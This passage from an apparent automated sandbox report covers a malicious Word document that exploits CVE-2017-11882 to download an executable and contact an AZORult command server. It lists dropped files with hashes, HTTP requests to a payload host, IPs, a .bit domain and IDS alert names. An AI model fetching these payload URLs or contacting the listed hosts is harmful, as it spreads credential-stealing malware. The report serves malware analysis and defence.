SHA256: a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\indweller.dll
executable
MD5: cbb335b0297b012c35e07586f7f4f917
SHA256: 4fc043350dfd1629f918d457cdc2d2b381deda9ceeea516d539625b5eda49839
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: a3f98568e7bc2f5c39ecf6921bdea314
SHA256: 5e03884365ff5a45dbc9d2306b1aa6cabbdc46203a474ca4b5564607cd24baad
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\104.206.242.208.url
text
MD5: 450e87158c232cb47f15f9163adee323
SHA256: 5b4ceb695980876ef314a469f59e6c419ee7099058989a52e308a92ab263aa1f
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\wiininilog.doc.url
text
MD5: 8a475c6581d9ff1d9e46878f9bed31ac
SHA256: 248ddc628c393a3ddc59dfa7e334abfa8cf6db6c43d2dfb63b0ce6d3f7e72237
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\made.rtf
text
MD5: 8274425de767b30b2fff1124ab54abb5
SHA256: 0d6afb7e939f0936f40afdc759b5a354ea5427ec250a47e7b904ab1ea800a01d
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR2E2F.tmp.cvr
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CD621AA.doc
text
MD5: 49ee599352e1cc20741f38af367acadc
SHA256: 27c382c7875688dbe2540e3507d36b29071beca044d10c52dc82f461856368c4
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA226967.doc
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0C26F31.doc
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\wiininilog[1].doc
text
MD5: 49ee599352e1cc20741f38af367acadc
SHA256: 27c382c7875688dbe2540e3507d36b29071beca044d10c52dc82f461856368c4
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{AE61C987-E616-4505-ABA6-3CB40E2558A2}.FSD
binary
MD5: f7b56e09c4cf544f870d27124d2eeff5
SHA256: 60ed4ed4ea92eaaeeb4ba36d3e9e81a3bc7a52b8c560b5588871e93ef5598abc
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6E5848D7-2C31-451F-86E2-DE5B4F138975}.FSD
binary
MD5: 8ae608f122b5a77453db2a24d988d1da
SHA256: ae8e34468e25559bb0c61bb96f7a44e57f2055f4f4bb07c61723691552ca2932
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
binary
MD5: 26bbd107ab21feab9f2cb68518335aa0
SHA256: a9ad18ba44b69ffa73682a402c9f65e0e4f8af6f18360b64033a54d569dc3a95
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
binary
MD5: 4c125b14785c73854692a411bd70426e
SHA256: 70edd038f4f218b58971575396c3d7cf7c4211245591e6e9bc5046ee23c96c08
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\{60157C6E-6759-4130-96DB-BBFF7D5FD502}
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
binary
MD5: fae2498568afdc83555d1e1fb4198aac
SHA256: 06d4067403973c06303f442fd204fde85a957fba725f7de4eebc2a4b14d74ee6
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
binary
MD5: d5cef42f5de312ba509c22aca253401a
SHA256: 56b4610d67b5d2f7626d2635f42a5a128b5fb5406868b8b4224e05c6f1411962
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\{706203E7-B9EC-49B0-A795-7A7D983B4B87}
––
MD5:  ––
SHA256:  ––
3704
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c.docx
pgc
MD5: 906817fd4e974dc60992a46466c0d54b
SHA256: 9df24106b8c1aeb2afa4f549eae334375d915f47ba32c504d3c582cb4e14551d
3704
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: d60d20a20527b37836471105c937c8c9
SHA256: d732ed54e40aa23e1f5e768da5969b8da55c63266851b617b2e390ce2bf33573
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\Tabulator
binary
MD5: c4c72325c9a8581d0cb70ade7e69bf53
SHA256: d01e209e2d2df2891fdf7c1939593c1ad8343cb74687cce51081b00a7bed0f66

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
21
TCP/UDP connections
14
DNS requests
3
Threats
20

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3704 WINWORD.EXE OPTIONS 200 104.206.242.208:80 http://104.206.242.208/ US
––
––
suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
–– –– OPTIONS 200 104.206.242.208:80 http://104.206.242.208/ US
––
––
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
3704 WINWORD.EXE GET 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
text
suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
text
suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
3704 WINWORD.EXE GET 304 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
3704 WINWORD.EXE GET 304 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
3704 WINWORD.EXE HEAD 200 104.206.242.208:80 http://104.206.242.208/wiininilog.doc US
––
––
suspicious
3288 EQNEDT32.EXE GET 200 104.206.242.208:80 http://104.206.242.208/12.ex US
executable
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
–– –– PROPFIND 405 104.206.242.208:80 http://104.206.242.208/ US
html
suspicious
–– –– POST 200 46.229.214.47:80 http://dogoodtome.bit/index.php RU
text
text
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3704 WINWORD.EXE 104.206.242.208:80 Eonix Corporation US suspicious
–– –– 104.206.242.208:80 Eonix Corporation US suspicious
3288 EQNEDT32.EXE 104.206.242.208:80 Eonix Corporation US suspicious
–– –– 151.80.147.153:53 OVH SAS FR suspicious
–– –– 91.217.137.44:53 Meganet-2003 LLC RU unknown
–– –– 80.233.248.109:53 SIA PostMet LV unknown
–– –– 46.229.214.47:80 RU malicious

DNS requests

Domain IP Reputation
dogoodtome.bit No response malicious

Threats

PID Process Class Message
3704 WINWORD.EXE A Network Trojan was detected SC TROJAN_DOWNLOADER Suspicious DOC loader of embedded OLE from external source
3704 WINWORD.EXE A Network Trojan was detected MALWARE [PTsecurity] Possible RTF CVE-2017-11882 document
3288 EQNEDT32.EXE A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
3288 EQNEDT32.EXE Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3288 EQNEDT32.EXE A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
3288 EQNEDT32.EXE A Network Trojan was detected ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3288 EQNEDT32.EXE Potentially Bad Traffic ET INFO SUSPICIOUS Dotted Quad Host MZ Response
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– Potentially Bad Traffic ET CURRENT_EVENTS DNS Query Domain .bit
–– –– A Network Trojan was detected ET TROJAN AZORult Variant.4 Checkin M2
–– –– A Network Trojan was detected MALWARE [PTsecurity] AZORult client request

Debug output strings

No debug info.